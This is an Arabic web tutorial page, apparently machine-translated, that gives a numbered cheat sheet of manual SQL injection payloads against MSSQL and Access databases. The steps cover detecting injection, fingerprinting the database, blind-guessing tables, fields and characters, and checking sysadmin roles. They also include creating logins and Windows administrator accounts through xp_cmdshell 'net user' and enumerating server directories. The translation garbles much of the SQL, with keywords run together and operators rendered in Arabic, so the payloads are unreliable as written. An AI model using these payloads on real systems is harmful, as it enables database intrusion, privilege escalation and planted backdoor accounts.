الصفحة الرئيسية>دروس برمجة الشبكات>البرنامج التعليمي لـ ASP

قمت بفرز أمر نص الحقن اليدوي [مع التعليقات]

الكاتب:Eve Cole وقت التحديث:2025-03-29 15:00:04

1. تحديد ما إذا كان هناك حقن ؛ و 1 = 1 ؛ و 1 = 2

2. الحكم الأولي على ما إذا كان MSSQL ؛ Anduser> 0

3. معلمات الحقن هي الأحرف "و [حالة الاستعلام] و" = "

4. 'و [حالة الاستعلام] و "٪ 25' = 'من المعلمات المصفاة أثناء البحث

5. Judge Database System

؛ و (selectCount (*) fromSysObjects)> 0MSSQL

؛ و (selectCount (*) frommsysObjects)> 0Access

6. تخمين قاعدة البيانات ؛ و (SelectCount (*) من [اسم قاعدة البيانات])> 0

7. تخمين الحقل. و (SelectCount (اسم الحقل) من اسم قاعدة البيانات)> 0

8. تخمين طول السجل في الحقل ؛ و (SelectTop1len (اسم الحقل) من اسم قاعدة البيانات)> 0

9. (1) خمن قيمة ASCII للحقل (الوصول)

؛ و (SelectTop1asc (Mid (اسم الحقل ، 1 ، 1)) من اسم قاعدة البيانات)> 0

(2) خمن قيمة ASCII للحقل (MSSQL)

؛ و (SelectTop1Unicode (Substring (اسم الحقل ، 1 ، 1)) من اسم قاعدة البيانات)> 0

10. بنية إذن الاختبار (MSSQL)

؛ و 1 = (selectis_srvrolemember ('sysadmin')) ؛-

؛ و 1 = (selectis_srvrolemember ('serveradmin')) ؛-

؛ و 1 = (selectis_srvrolemember ('setupadmin')) ؛-

؛ و 1 = (selectis_srvrolemember ('SecurityAdmin')) ؛-

؛ و 1 = (selectis_srvrolemember ('diskadmin')) ؛-

؛ و 1 = (selectis_srvrolemember ('bulkadmin')) ؛-

؛ و 1 = (selectis_member ('db_owner')) ؛-

11. أضف MSSQL وحساب النظام

؛ execmaster.dbo.sp_addloginusername ؛-

؛ execmaster.dbo.sp_passwordnull ، اسم المستخدم ، كلمة المرور ؛-

؛ execmaster.dbo.sp_addsrvrolembersysadminusername ؛-

؛ execmaster.dbo.xp_cmdshell'netuserusernamepassword

/محطات العمل:*/الأوقات: All/PasswordChg: نعم/كلمة المرور: نعم/نشط: نعم/إضافة '؛-

؛ execmaster.dbo.xp_cmdshell'netuserusernamepassword/add '؛-

؛ execmaster.dbo.xp_cmdshell'netlocalgroupadministratorsusername/add '؛-

12. (1) نقل الدليل

؛ CreateTableDirs (Pathsvarchar (100) ، Idint)

؛ insertDirsexecmaster.dbo.xp_dirtree'c:/'

؛ و (selectTOP1PathSfromdirs)> 0

؛ و (selectTOP1PathSfromDirswherePathsnotin ('مسارات تم الحصول عليها من الخطوة السابقة')>)>)

(2) اجتياز الدليل

؛ CreateTableTemp (Idnvarchar (255) ، num1nvarchar (255) ، num2nvarchar (255) ، num3nvarchar (255)) ؛-

؛ inserttempexecmaster.dbo.xp_availablemedia ؛ -etl جميع محركات الأقراص الحالية

؛ insertintotemp (id) execmaster.dbo.xp_subdirs'c:/'؛-الحصول على قائمة الدليل الفرعي

؛ insertIntotemp (id ، num1) execmaster.dbo.xp_dirtree'c:/'؛-احصل على بنية شجرة الدليل لجميع الدلائل الفرعية

مقالات ذات صلة